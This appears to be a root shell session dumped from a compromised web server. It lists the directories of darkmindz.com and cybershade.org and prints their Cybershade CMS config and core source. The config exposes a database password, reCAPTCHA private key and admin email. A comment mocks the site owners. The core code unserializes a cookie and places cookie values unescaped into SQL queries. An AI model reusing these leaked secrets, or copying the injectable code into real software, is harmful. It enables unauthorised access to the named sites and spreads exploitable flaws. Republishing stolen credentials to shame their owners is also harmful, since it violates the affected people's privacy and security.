root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# ls -al
total 164
drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 .
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 ..
-rw-r--r-- 1 romeo romeo 731 Jan 13 07:34 admin.js
-rw-r--r-- 1 romeo romeo 27395 Feb 18 09:08 base_functions.php
-rw-r--r-- 1 romeo romeo 9098 Feb 21 10:50 bbcode_tags.php
-rw-r--r-- 1 romeo romeo 2816 Feb 1 08:55 cacher.php
drwxr-xr-x 4 romeo romeo 4096 Feb 10 13:29 classes
-rw-r--r-- 1 romeo romeo 1436 Feb 2 08:33 cli.php
-rw-r--r-- 1 romeo romeo 2848 Feb 8 08:46 config.php
-rw-r--r-- 1 romeo romeo 23810 Apr 19 16:45 core.php
-rw-r--r-- 1 romeo romeo 4518 Feb 1 08:55 cron.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 err
-rw-r--r-- 1 romeo romeo 236 Feb 2 08:33 force_user.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 functions
-rw-r--r-- 1 romeo romeo 1181 Feb 2 08:33 key.php
-rw-r--r-- 1 romeo romeo 6903 Feb 2 08:33 mailer.php
drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 mint
-rw-r--r-- 1 romeo romeo 3054 Feb 14 06:17 page_footer.php
-rw-r--r-- 1 romeo romeo 5935 Feb 14 06:17 page_header.php
-rw-r--r-- 1 romeo romeo 9762 Feb 2 08:33 recaptchalib.php
-rw-r--r-- 1 romeo romeo 6658 Apr 26 07:51 security.php
-rw-r--r-- 1 romeo romeo 2021 Feb 2 08:33 usertracker.php
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# cat config.php
<?php
//Cybershade.Org

//Database Stuff
$config['db']['host'] = 'localhost';
$config['db']['username'] = 'romeo_romeo';
$config['db']['password'] = 'swU55ath';
$config['db']['database'] = 'romeo_DMZ_CS';
$config['db']['prefix'] = 'dmz_';
$config['db']['shrfix'] = 'shr_'; //the prefix
for the shared tables
$config['db']['ckefix'] = 'CMS_'; //the cookie prefix
$config['db']['ckeauth'] = '0.7.0'; //the cookie auth key //this
is also a good way to invalidate the autologins on cms update
$config['site']['working_dir'] = '';

//config vars for if we loose the DB
$config['cms']['name'] = 'DarkMindZ';
$config['cms']['version'] = '_DDoS';
$config['cms']['debug'] = "0";
$config['site']['title'] = 'CyberShade CMS';
$config['site']['theme'] = 'cs';
$config['site']['language'] = 'en';
$config['site']['keywords'] = '';
$config['site']['description'] = '';
$config['site']['max_login_tries'] = "5";
$config['site']['time'] = 'jS F h:ia';
$config['site']['template_override'] = "1";
$config['site']['auto_login'] = "1";
$config['site']['ips_max_before_ban'] = "5";

$config['site']['hourly_time'] = 3600; //1 Hour
$config['site']['daily_time'] = (3600*24); //1 Day
$config['site']['weekly_time'] = (3600*24*7); //1 Week

$config['site']['default_module'] = 'core';
$config['site']['closed'] = "0";
$config['site']['admin_email'] = 'romeo.haxxor@gmail.com';
$config['site']['usernamechange'] = "0";
$config['site']['fc_update'] = "1220620615";
$config['site']['paginate'] = "8";
$config['site']['news_cat'] = "2";
$config['site']['captcha_pub'] =
'6Lf-qAQAAAAAANqWAU4YSnkwdy0M2mClwO3IOhTe';
$config['site']['captcha_priv'] =
'6Lf-qAQAAAAAAOLgdFyr4dAhaDnnx2Nic0Wlpf6Q ';
$config['site']['announcement'] = 'No Current Announcements, This may
be because the Database has gone down.';
$config['rss']['global_limit'] = "15";
$config['site']['max_whitelist'] = "5";
$config['movemod']['move_enabled'] = "0";
$config['site']['quick_replys'] = "0";
$config['site']['users_online'] = "0";
$config['site']['guests_online'] = "0";

//Statistics shit fort the same reason (Only used when the DB is inactive,
setting it to time() + 9999999 means the cron will never be run)
$config['statistics']['hourly_cron'] = "9999999999999";
$config['statistics']['daily_cron'] = "9999999999999";
$config['statistics']['weekly_cron'] = "9999999999999";
$config['statistics']['total_members'] = 'N/A, (DDoS)';
$config['statistics']['last_user_user'] = 'N/A, (DDoS)';
$config['statistics']['last_user_id'] = 'N/A, (DDoS)';
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2
core]# cat core.php
<?php
/*======================================================================*\
| Cybershade CMS - Your CMS, Your Way. |
\*======================================================================*/
if(!defined('INDEX_CHECK')){die("INDEX_CHECK not defined.");}

error_reporting ($_SERVER['HTTP_HOST']=='localhost' ?(E_ALL) : (0));
define('SMODE', ($_SERVER['HTTP_HOST']=='localhost' ? 0 : 1));
//this is to start the generation timer off
$gen_time = microtime();

//Include the session stuff
if(!SMODE) require($cms_root."core/classes/class.session.php");
if(SMODE) require($cms_root."core/classes/classes.php");
$_sess = new session;

//Set the headers
header("Cache-control: private");
header("Content-Type: text/html; charset=utf-8");
//ob_start("ob_gzhandler");

/////////////////////////////////////////////////////////////////////////////
//--Include the core CMS files needed -------------------------------------//
/////////////////////////////////////////////////////////////////////////////

//The config files
require($cms_root."core/config.php");

/*this is the ultimate cache-er xD, k so basically u got
* the var below which "allows" the static cacher through
*/

#$allow = true;

//this little switch decided what should be auto cache'd
/*switch(CMS_MENU){
case 'forum': $allow = false; break;
case 'admin': $allow = false; break;
case 'ucp': $allow = false; break;
case 'login': $allow = false; break;
case 'main': $allow = false; break;
case 'pm': $allow = false; break;
default: $allow = true; break;
}

if($allow){
// Get the modification date of this PHP file
$timestamps = array(@getlastmod());

// The latest of these modification dates is our real Last-Modified date
$timestamp = max($timestamps);

// Note that this is not a RFC 822 date (the tz is always GMT)
$tsstring = gmdate("D, d M Y H:i:s ", $timestamp) . "GMT";

// Check if the client has the same page cached
if (isset($_SERVER["HTTP_IF_MODIFIED_SINCE"]) &&
($_SERVER["HTTP_IF_MODIFIED_SINCE"] == $tsstring)) {
header("HTTP/1.1 304 Not Modified");
exit();
}
// Inform the user what is our last modification date
else {
header("Last-Modified: " . $tsstring);
}
}*/

//The class files
require($cms_root."core/classes/class.sql.php");
if(!SMODE)require($cms_root."core/classes/class.login.php");
if(!SMODE)require($cms_root."core/classes/class.user.php");
if(!SMODE)require($cms_root."core/classes/class.form.php");
if(!SMODE)require($cms_root."core/classes/class.time.php");
require($cms_root."core/classes/class.nbbc.php");
require($cms_root."core/classes/class.tpl.php");
if(!SMODE)require($cms_root."core/classes/class.cache.php");
require($cms_root."core/classes/class.geshi.php");

//The base functions
require($cms_root."core/base_functions.php");

/////////////////////////////////////////////////////////////////////////////
//--Sort out the cached config stuff---------------------------------------//
/////////////////////////////////////////////////////////////////////////////
$config_db = array();
//check see if the config file exists, if not then just create a blank config
variable
if(file_exists($cms_root."cache/cache_config.php")){ include
$cms_root."cache/cache_config.php"; }

//If the config_db is not null, cached.. then use it.
if($config_db !== NULL){
foreach($config_db as $array){
$config[$array['array']][$array['var']] = $array['value'];
}
unset($array);
}

if(isset($_GET['_site'])){
$a=(isset($_GET['_site']) ? $_GET['_site'] :
(isset($_SESSION['site']['mode']) ? $_SESSION['site']['mode'] :
$config['db']['prefix']));
switch($a){
case 'dmz':
$_SESSION['site']['mode'] = 'dmz_';
break;
case 'cs':
$_SESSION['site']['mode'] = 'cs_';
break;
default:
}
}
if(isset($_SESSION['site']['mode']))
$config['db']['prefix'] = $_SESSION['site']['mode'];

/////////////////////////////////////////////////////////////////////////////
//--Define new instances of required classes-------------------------------//
/////////////////////////////////////////////////////////////////////////////
//start the sql
$_sql = new sql(true);
$_sql->config = $config;
if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }


//Open the session stuff
$_sess->sql = $_sql;
$_sess->config = $config;

//start the form class
$_form = new form;

//start the user class
$_user = new user;
$_user->config = $config;
$_user->sql = $_sql;


//start the login
$_login = new login((isset($config['site']['autologin']) ? true : false));
$_login->config = $config;
$_login->sql = $_sql;
$_login->form = $_form;
$_login->sess = $_sess;
$_login->user = $_user;
$_user->login = $_login;

//require($cms_root."core/key.php");

//start the time class
$_time = new time;
$_time->config = $config;

//start the bbcode class
$_bbcode = new bbcode;
$_bbcode->SetDebug(true);
$_bbcode->SetDetectURLs(false);
$_bbcode->SetURLPattern('<a href="{$url/h}">{$text/h} <img
src="/'.root().'images/external.gif" width="11" height="11" alt="External Link"
/></a>');
$_bbcode->ClearSmileys();
$_bbcode->SetSmileyDir('/'.root().'images/smilies');
include($cms_root."core/bbcode_tags.php");

$_bbcode->user = $_user;
$_user->bbcode = $_bbcode;

//start the cache && template classes
$_cache_path = $cms_root."cache/";
if (is_dir($_cache_path)){ @chmod($_cache_path, 0777); }
$_cache_ = (is_writable($_cache_path) ? true : false);
$_cache = new Cache($_sql, $_cache_path, $_cache_);
$_cache->config = $config['db'];

//regenerate the site cache
if($config!==NULL || !empty($config)){
$config_db = $_cache->generate_cache("config_db", "cache_config.php",
"SELECT * FROM ".$config['db']['prefix']."config");
foreach($config_db as $array){
$config[$array['array']][$array['var']] = $array['value'];
}
unset($array,$config_db);
}

//start the template class
$_template = new template('.', $_cache_, $_cache_path."files/");
$_template->cms_root = $cms_root;
$_template->user = $_user;

$_login->template = $_template;

//start the language class
$_language = $config['site']['language'];
if(isset($_SESSION['user']['language'])){

if(file_exists($cms_root."language/".$_SESSION['user']['language']."/main.php")
){
$_language = $_SESSION['user']['language'];
}
}
require($cms_root."language/".$_language."/main.php");
$_time->cur_lang = $_language;

//run the lang pass function on the language vars AFTER we included the base
functions.
foreach($_lang as $key => $value){
if(!is_array($_lang[$key])){
$_lang[$key] = lang_pass($_lang[$key]);
}
}

$_time->lang = $_lang;
$_bbcode->lang = $_lang;
$_login->lang = $_lang;
//Include the security files.. recaptchalib maybe add into the login class
require($cms_root."core/security.php");

require($cms_root."core/classes/class.captcha.php");
$_captcha = new Captcha($config['site']['captcha_pub'],
$config['site']['captcha_priv']);

$_cms_root = $cms_root;
//Include the mailer
require($cms_root."core/mailer.php");
$cms_root = $_cms_root;

/////////////////////////////////////////////////////////////////////////////
//--Continue with the configuration----------------------------------------//
/////////////////////////////////////////////////////////////////////////////
define('ADMIN', 9);
define('DEV', 8);
define('GMOD', 7);
define('MOD', 5);
define('USER', 1);
define('BANNED', 0);

//add some stuff to the config

//generate guest defaults
$guest['user']['id'] = '0';
$guest['user']['username'] = 'Guest';
$guest['user']['theme'] = $config['site']['theme'];
$guest['user']['userkey'] = isset($_SESSION['user']['userkey']) ?
$_SESSION['user']['userkey'] : NULL;

//generate user stuff
$config['global']['user'] = (isset($_SESSION['user']['id']) ? $_SESSION['user']
: $guest['user']);
$config['global']['ip'] = getIP();
|
||
$config['global']['useragent'] = secureit(isset($_SERVER['HTTP_USER_AGENT']) ?
|
||
$_SERVER['HTTP_USER_AGENT'] : NULL);
|
||
$config['site']['guests_online'] = (isset($guests_online) &&
|
||
is_numeric($guests_online) ? $guests_online : 0);
|
||
$config['site']['users_online'] = (isset($_users_online) &&
|
||
is_numeric($_users_online) ? $_users_online : 0);
|
||
$_user->is_online = $_login->is_online = isset($_SESSION['user']['id']) ? true
|
||
: false;
|
||
|
||
#if(!isset($_SESSION['user']['id'])){$_SESSION['user'] = $guest['user'];}
|
||
|
||
$tpl = $config['site']['theme'];
if($config['site']['template_override']){
    if(!is_dir($cms_root.'template/'.$tpl.'/')){$tpl = 'vone';}
}else{
    if(isset($config['global']['user']['template']) && is_dir($cms_root."template/".$config['global']['user']['template']."/")){
        $tpl = $config['global']['user']['template'];
    }
}
$_template->config = $config;
$_template->tpl = $tpl;

//None of these should be defined as vars as they can be over writtin.. They are defines
$_module = (is_string(isset($_GET['module'])) ? $_GET['module'] : $config['site']['default_module']);
$_user_temp = $cms_root."template/".$tpl."/";
$_module_temp = $cms_root."modules/".$_module."/template/";

if(isset($_SESSION['login']) && isset($_SESSION['user']['id'])){
    unset($_SESSION['login']);
}

$_template->set_rootdir($cms_root);

define('IS_MOD', $_user->check_permissions($config['global']['user']['id'], MOD));
define('IS_GMOD', $_user->check_permissions($config['global']['user']['id'], GMOD));
define('IS_DEV', $_user->check_permissions($config['global']['user']['id'], DEV));
define('IS_ADMIN', $_user->check_permissions($config['global']['user']['id'], ADMIN));

/////////////////////////////////////////////////////////////////////////////
//--Grab the neccesarry cache files----------------------------------------//
/////////////////////////////////////////////////////////////////////////////
//this defines which of the cache files to include
//require($cms_root.'core/cacher.php');


/////////////////////////////////////////////////////////////////////////////

//--Cacher.php-------------------------------------------------------------//

/////////////////////////////////////////////////////////////////////////////
$cache_gen = array('statistics', 'menu', 'minimenu', 'groups', 'bans', 'user_permissions', NULL);#'badwords', 'affiliates',
$x=0;
include($cms_root."cache/cache.php");
while($var = $cache_gen[$x]){
    if($var != ''){
        $gen = NULL;
        eval('$gen = $'.$var.'_db;');

        /*if(file_exists($cms_root.'cache/cache_'.$var.'.php')){
            include($cms_root."cache/cache_".$var.".php");
            eval('$gen = $'.$var.'_db;');
        }*/
        if ($gen !== NULL || !empty($gen)){
            foreach($gen as $k => $v){
                $config[$var][$k] = $v;
            }
        }else{
            //regenerate the cache if not avalible
            switch($var){
                case 'config':
                    $config[$var] = $_cache->generate_cache("config_db", "cache_config.php", "SELECT * FROM ".$config['db']['prefix']."config", NNUM);
                    break;
                case 'minimenu':
                    $config[$var] = $_cache->generate_cache("minimenu_db", "cache_minimenu.php", "SELECT * FROM ".$config['db']['prefix']."mmenus ORDER BY disporder ASC");
                    break;

                case 'menu':
                    $config[$var] = $_cache->generate_cache("menu_db", "cache_menu.php", "SELECT * FROM ".$config['db']['prefix']."menus ORDER BY id ASC", NNUM);
                    break;

                case 'statistics':
                    $config[$var] = $_cache->generate_statistics_cache();
                    break;

                case 'groups':
                    $config[$var] = $_cache->generate_cache("groups_db", "cache_groups.php", "SELECT * FROM ".$config['db']['prefix']."groups ORDER BY rank DESC");
                    break;
                case 'bans':
                    $config[$var] = $_cache->generate_cache("bans_db", "cache_bans.php", "SELECT * FROM ".$config['db']['shrfix']."banned");
                    break;
                //case 'affiliates':
                // $config[$var] = $_cache->generate_cache("affiliates_db", "cache_affiliates.php", "SELECT * FROM ".$config['db']['prefix']."affiliates");
                //break;
                //case 'module_permissions':
                // $config[$var] = $_cache->generate_cache("module_permissions_db", "cache_module_permissions.php", "SELECT * FROM ".$config['db']['prefix']."module_permissions");
                //break;
                case 'user_permissions':
                    $config[$var] = $_cache->generate_upermissions_cache();

                    break;
            }

        }
    }
    $x++;
}

/////////////////////////////////////////////////////////////////////////////

//--Cacher.php-------------------------------------------------------------//

/////////////////////////////////////////////////////////////////////////////


$_user->groups = $config['groups'];
//$_user->module_permissions = $config['module_permissions'];
$_user->permissions = $config['user_permissions'];

/////////////////////////////////////////////////////////////////////////////
//--Cron - This will sort the majority of the cache and--------------------//
//---------db problems out for us------------------------------------------//
/////////////////////////////////////////////////////////////////////////////

//include($cms_root.'core/cron.php');


/////////////////////////////////////////////////////////////////////////////

//--Cron.php---------------------------------------------------------------//

/////////////////////////////////////////////////////////////////////////////

if(!defined('NO_DB')){
    $hourly_cron = FALSE;
    if(isset($config['site']['hourly_time'])){
        if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
            $_sql->updateRow("statistics", array('value' => time()), "variable = 'hourly_cron'");
            $hourly_cron = TRUE;
        } else {
            if($config['site']['hourly_time'] == 0){
                $hourly_cron = TRUE;
            }else{
                if((time() - $config['site']['hourly_time']) > $config['statistics']['hourly_cron']){
                    $_sql->updateRow("statistics", array('value' => time()), "variable = 'hourly_cron'");
                    $hourly_cron = TRUE;
                }
            }
        }
    }

    $daily_cron = FALSE;
    if(isset($config['site']['daily_time'])){
        if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
            $_sql->updateRow("statistics", array('value' => time()), "variable = 'daily_cron'");
            $daily_cron = TRUE;
        } else {
            if($config['site']['daily_time'] == 0){
                $daily_cron = TRUE;
            }else{
                if((time() - $config['site']['daily_time']) > $config['statistics']['daily_cron']){
                    $_sql->updateRow("statistics", array('value' => time()), "variable = 'daily_cron'");
                    $daily_cron = TRUE;
                }
            }
        }
    }

    $weekly_cron = FALSE;
    if(isset($config['site']['weekly_time'])){
        if($config['global']['useragent'] == "Cybershade_CRON_Updater"){
            $_sql->updateRow("statistics", array('value' => time()), "variable = 'weekly_cron'");
            $weekly_cron = TRUE;
        } else {
            if($config['site']['weekly_time'] == 0){
                $weekly_cron = TRUE;
            }else{
                if((time() - $config['site']['weekly_time']) > $config['statistics']['weekly_cron']){
                    $_sql->updateRow("statistics", array('value' => time()), "variable = 'weekly_cron'");
                    $weekly_cron = TRUE;
                }
            }
        }
    }
}

$stat_cache = false;
if(!defined('NO_DB')){
    if($hourly_cron){
        $_sql->record_message('Hourly CRON is running');
        //delete users from sql that are inactive and set users offline that are inactive too
        $_sql->query("UPDATE shr_users
            SET timestamp = ( SELECT cs_online.timestamp FROM cs_online WHERE cs_online.uid = shr_users.id)
            WHERE EXISTS
            ( SELECT cs_online.timestamp FROM cs_online WHERE cs_online.uid = shr_users.id)");
        $_sql->deleteRow('online', "login_time < ".$_time->mod_time(time(), 0, 20, 0, 'TAKE')." AND timestamp < ".$_time->mod_time(time(), 0, 20, 0, 'TAKE'));
        $_sql->query('DELETE FROM `shr_banned` WHERE `user_ip` LIKE "66.249%"');
        $_cache->generate_statistics_cache();
        $stat_cache = true;

    }

    if($daily_cron){
        $_sql->record_message('Daily CRON is running');
        //update caches
        if(!$stat_cache){
            $_cache->generate_statistics_cache();
            $stat_cache = true;
        }

        if($config['forum']['auto_lock']){
            //Auto Lock Thread Timer
            $ex = $_time->mk_time(time()-$config['forum']['auto_lock_cron'], '', 1);
            $_sql->updateRow('forum_topics', array('locked'=>1), "last_poster <= $ex", 1);
        }

        $_sql->query("DELETE FROM ".$config['db']['shrfix']."pastebin WHERE expire < ".time()."");

        $_cache->generate_upermissions_cache();
        $_cache->generate_cache("minimenu_db", "cache_minimenu.php", "SELECT * FROM ".$config['db']['prefix']."mmenus ORDER BY disporder ASC");
        $_cache->generate_cache("menu_db", "cache_menu.php", "SELECT * FROM ".$config['db']['prefix']."menus ORDER BY id ASC", NNUM);
        //$_cache->generate_cache("module_permissions_db", "cache_module_permissions.php", "SELECT * FROM ".$config['db']['prefix']."module_permissions");

    }

    if($weekly_cron){
        $_sql->record_message('Weekly CRON is running');
        if(!$stat_cache){
            $_cache->generate_statistics_cache();
            $stat_cache = true;
        }

        $_cache->generate_cache("config_db", "cache_config.php", "SELECT * FROM ".$config['db']['prefix']."config");
        $_cache->generate_cache("groups_db", "cache_groups.php", "SELECT * FROM ".$config['db']['prefix']."groups ORDER BY rank DESC");

        //Optimise all of the tables in the DB
        $alltables = $_sql->getTable("SHOW TABLES");
        $tables = '';
        $counter = count($alltables);
        $x = 0;
        $add = ", ";
        foreach($alltables as $table){
            foreach ($table as $tablename){
                if($x == ($counter-1)){
                    $add = '';
                }
                $tables .= "`$tablename`$add";
                $x++;
            }
        }
        $_sql->query("OPTIMIZE TABLE $tables");
        $_sql->updateRow("statistics", array('value' => time()), "variable = 'weekly_time'", FALSE);
    }

    if($weekly_cron || $daily_cron || $hourly_cron){
        define('FILE_MERGE', 1);
        include($cms_root.'merge.php');
    }
}

/////////////////////////////////////////////////////////////////////////////

//--Cron.php---------------------------------------------------------------//

/////////////////////////////////////////////////////////////////////////////

/////////////////////////////////////////////////////////////////////////////
//--Check weather the site is closed---------------------------------------//
/////////////////////////////////////////////////////////////////////////////
if (($config['site']['closed'] == 1) && (!defined("CMS_CLOSED"))){
    if (!$_user->check_permissions($config['global']['user']['id'], ADMIN)){
        die(die_error(4));
    }
}

/////////////////////////////////////////////////////////////////////////////
//--Check weather a user is banned-----------------------------------------//
/////////////////////////////////////////////////////////////////////////////
/**
if ($config['bans'] != NULL){
    foreach ($config['bans'] as $bans){
        if ($bans['user_ip'] == $config['global']['ip']){
            die(die_error($bans['die']));
        }
    }
}
**/

/////////////////////////////////////////////////////////////////////////////
//--Sort out the guests & users online stuff-------------------------------//
/////////////////////////////////////////////////////////////////////////////

//include($cms_root.'core/usertracker.php');


/////////////////////////////////////////////////////////////////////////////

//--UserTracker.php--------------------------------------------------------//

/////////////////////////////////////////////////////////////////////////////
if(!defined('NO_DB') && !defined('NO_LOG')){

    if(!isset($_SESSION['user']['userkey'])){
        //cookie check
        if(!$_user->is_online){
            if(isset($_COOKIE[$config['db']['ckefix'].'login']) && !empty($_COOKIE[$config['db']['ckefix'].'login'])){
                $cookie = unserialize($_COOKIE[$config['db']['ckefix'].'login']);
                if(isset($cookie[1]) && (int)isset($cookie[0])){
                    if($cookie[1] == $_login->mk_passwd($_SERVER['HTTP_USER_AGENT'], $config['db']['ckeauth'])){
                        if($config['login']['autologinIpRestriction']) $aq = " AND user_ip = '".getIP()."'";
                        $query = $_sql->getTable("SELECT uid FROM ".$config['db']['shrfix']."userkeys WHERE uid = '".$cookie[0]."' AND user_agent = '".$cookie[1]."'".(isset($aq) ? $aq : '')." LIMIT 1;");
                        if (count($query) == 1){
                            $user = $_sql->getTable("SELECT timestamp FROM ".$config['db']['shrfix']."users WHERE id = '".$cookie[0]."' LIMIT 1");
                            if($user!==NULL){
                                $user = $user[0];

                                $_sess->set_sessions($cookie[0]);

                                $_SESSION['user']['last_visit'] = $user['timestamp'];
                                $_user->new_user($cookie[0], 'alogin');


                                if($_user->get_new_threads($_SESSION['user']['last_visit']))
                                    setNotification('We have just updated your forum icons to reflect new posts.', 'Forum Icons Updated', false, $_SESSION['user']['id']);
                                $config['global']['user']['id'] = $_SESSION['user']['id'];
                            }
                        }else{//if count query == 1
                            setcookie($config['db']['ckefix']."login", null, time() - 31536000); //set cookie to remember me

                            unset($_COOKIE[$config['db']['ckefix']."login"]);
                        }
                    }else{ //if cookie == http user agent
                        setcookie($config['db']['ckefix']."login", null, time() - 31536000); //set cookie to remember me

                        unset($_COOKIE[$config['db']['ckefix']."login"]);
                    }
                }else{//if cookie info == valid
                    setcookie($config['db']['ckefix']."login", null, time() - 31536000); //set cookie to remember me
                    unset($_COOKIE[$config['db']['ckefix']."login"]);
                }
                redirect($_SERVER["PHP_SELF"]);

            }
        }
        $_user->new_user($config['global']['user']['id']);
    }else{
        $return = $_user->update_location();
        if($return == 0){
            $_user->new_user($config['global']['user']['id']);
        }
    }

}

/////////////////////////////////////////////////////////////////////////////

//--UserTracker.php--------------------------------------------------------//

/////////////////////////////////////////////////////////////////////////////

/**
 * Thanks to Jesus for this baby, this will add the level of sanitation required for the diffrent data types
 */
function secureit($string, $type=''){
    switch($type){
        case 'post':
            $string = mysql_real_escape_string($string);
            break;
        default:
            $string = mysql_real_escape_string($string);
            $string = htmlentities($string);
            $string = stripslashes($string);
            $string = strip_tags($string);
            break;
    }
    return $string;
}
if (isset($_GET['code']) && $_user->check_permissions($config['global']['user']['id'], DEV)) {
    $explode = explode('/', $_SERVER['PHP_SELF']);
    die(highlight_file($explode[count($explode)-1], 1));
}
?>
root@server2:/home/romeo/domains/darkmindz.com/public_html/core[root@server2 core]# less Gre.php
<?php
/*======================================================================*\
| Cybershade CMS - Your CMS, Your Way. |
\*======================================================================*/
if(!defined('INDEX_CHECK')){die("INDEX_CHECK not defined.");}

error_reporting ($_SERVER['HTTP_HOST']=='localhost' ?(E_ALL) : (0));
define('SMODE', ($_SERVER['HTTP_HOST']=='localhost' ? 0 : 1));
//this is to start the generation timer off
$gen_time = microtime();

//Include the session stuff
if(!SMODE) require($cms_root."core/classes/class.session.php");
if(SMODE) require($cms_root."core/classes/classes.php");
$_sess = new session;

//Set the headers
header("Cache-control: private");
header("Content-Type: text/html; charset=utf-8");
//ob_start("ob_gzhandler");

/////////////////////////////////////////////////////////////////////////////
//--Include the core CMS files needed -------------------------------------//
core.php
/////////////////////////////////////////////////////////////////////////////

//The config files
require($cms_root."core/config.php");

/*this is the ultimate cache-er xD, k so basically u got
 * the var below which "allows" the static cacher through
 */

#$allow = true;

//this little switch decided what should be auto cache'd
/*switch(CMS_MENU){
    case 'forum': $allow = false; break;
    case 'admin': $allow = false; break;
    case 'ucp': $allow = false; break;
    case 'login': $allow = false; break;
    case 'main': $allow = false; break;
    case 'pm': $allow = false; break;
    default: $allow = true; break;
}

if($allow){
    // Get the modification date of this PHP file
    $timestamps = array(@getlastmod());

    // The latest of these modification dates is our real Last-Modified date
    $timestamp = max($timestamps);

    // Note that this is not a RFC 822 date (the tz is always GMT)
    $tsstring = gmdate("D, d M Y H:i:s ", $timestamp) . "GMT";

    // Check if the client has the same page cached
    if (isset($_SERVER["HTTP_IF_MODIFIED_SINCE"]) &&
        ($_SERVER["HTTP_IF_MODIFIED_SINCE"] == $tsstring)) {
        header("HTTP/1.1 304 Not Modified");
        exit();
    }
    // Inform the user what is our last modification date
    else {
        header("Last-Modified: " . $tsstring);
    }
}*/

//The class files
require($cms_root."core/classes/class.sql.php");
if(!SMODE)require($cms_root."core/classes/class.login.php");
if(!SMODE)require($cms_root."core/classes/class.user.php");
if(!SMODE)require($cms_root."core/classes/class.form.php");
if(!SMODE)require($cms_root."core/classes/class.time.php");
require($cms_root."core/classes/class.nbbc.php");
require($cms_root."core/classes/class.tpl.php");
if(!SMODE)require($cms_root."core/classes/class.cache.php");
require($cms_root."core/classes/class.geshi.php");

//The base functions
require($cms_root."core/base_functions.php");

/////////////////////////////////////////////////////////////////////////////
//--Sort out the cached config stuff---------------------------------------//
/////////////////////////////////////////////////////////////////////////////
$config_db = array();
//check see if the config file exists, if not then just create a blank config variable
if(file_exists($cms_root."cache/cache_config.php")){ include $cms_root."cache/cache_config.php"; }

//If the config_db is not null, cached.. then use it.
if($config_db !== NULL){
    foreach($config_db as $array){
        $config[$array['array']][$array['var']] = $array['value'];
    }
    unset($array);
}

if(isset($_GET['_site'])){
    $a=(isset($_GET['_site']) ? $_GET['_site'] : (isset($_SESSION['site']['mode']) ? $_SESSION['site']['mode'] : $config['db']['prefix']));
    switch($a){
        case 'dmz':
            $_SESSION['site']['mode'] = 'dmz_';
            break;
        case 'cs':
            $_SESSION['site']['mode'] = 'cs_';
            break;
        default:
    }
}
if(isset($_SESSION['site']['mode']))
    $config['db']['prefix'] = $_SESSION['site']['mode'];

/////////////////////////////////////////////////////////////////////////////
//--Define new instances of required classes-------------------------------//
/////////////////////////////////////////////////////////////////////////////
//start the sql
$_sql = new sql(true);
$_sql->config = $config;
if(!defined('CMS_DEBUG')){ define('CMS_DEBUG', $config['cms']['debug']); }
if(!$_sql->connect(CMS_DEBUG)){ define('NO_DB', 1); }


//Open the session stuff
$_sess->sql = $_sql;
$_sess->config = $config;

//start the form class
$_form = new form;

//start the user class
$_user = new user;
$_user->config = $config;
$_user->sql = $_sql;
root@server2:/home/romeo/domains[root@server2 domains]# cd cybershade.org/

# RoMeO's butt buddy xlink aka mad php c0d3r
root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]# ls -al
drwxr-xr-x 2 romeo romeo 4096 Dec 23 14:31 .htpasswd
drwxr-xr-x 2 root root 4096 May 23 00:10 logs
drwx--x--x 3 romeo romeo 4096 Dec 23 14:31 public_ftp
drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 public_html
drwxr-xr-x 2 root root 4096 May 1 00:10 stats
root@server2:/home/romeo/domains/cybershade.org[root@server2 cybershade.org]# cd public_html/
root@server2:/home/romeo/domains/cybershade.org/public_html[root@server2 public_html]# ls -al
total 1188
drwxr-xr-x 13 romeo romeo 4096 May 19 22:42 .
drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 ..
-rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 400.shtml
-rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 401.shtml
-rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 403.shtml
-rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 404.shtml
-rwxr-xr-x 1 romeo romeo 515 Feb 10 19:31 500.shtml
-rw-r--r-- 1 romeo romeo 5254 Feb 16 08:01 acp.php
-rw-r--r-- 1 romeo romeo 9757 Feb 16 08:01 ajax.php
-rw-r--r-- 1 romeo romeo 2118 Feb 16 08:01 articles.php
drwxrwxrwx 5 romeo romeo 4096 Feb 10 19:31 cache
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 cgi-bin
-rw-r--r-- 1 romeo romeo 5561 Feb 16 08:01 challenges.php
-rw-r--r-- 1 romeo romeo 466963 Mar 1 14:51 cms_docs.zip
-rw-r--r-- 1 romeo romeo 2137 Feb 10 19:31 codebase.php
-rw-r--r-- 1 romeo romeo 17251 Feb 10 19:31 convertor.php
drwxr-xr-x 6 romeo romeo 4096 Feb 10 19:31 core
-rw-r--r-- 1 romeo romeo 0 Feb 10 19:31 debug
-rw-r--r-- 1 romeo romeo 3266 Feb 10 19:31 eg.gif
-rw-r--r-- 1 romeo romeo 28213 Mar 20 12:59 farm.php
-rw-r--r-- 1 romeo romeo 5020 Feb 16 08:01 forgotpass.php
-rw-r--r-- 1 romeo romeo 7097 Feb 19 14:12 forum.php
-rw-r--r-- 1 romeo romeo 2110 Feb 16 08:01 get_shouts.php
-rw-r--r-- 1 romeo romeo 4546 Feb 19 14:12 .htaccess
-rw-r--r-- 1 romeo romeo 36 Feb 10 19:31 .htpasswd
drwxr-xr-x 4 romeo romeo 4096 Feb 10 19:31 images
drwxr-xr-x 2 romeo romeo 4096 Feb 10 19:31 img
-rw-r--r-- 1 romeo romeo 3998 Feb 16 08:01 index.php
-rw-r--r-- 1 romeo romeo 843 Feb 16 08:01 irc.php
drwxr-xr-x 3 romeo romeo 4096 Feb 10 19:31 language
-rw-r--r-- 1 romeo romeo 4103 Feb 19 14:12 latest_posts.php
-rwxr-xr-x 1 romeo romeo 7184 Feb 16 08:01 loader.php
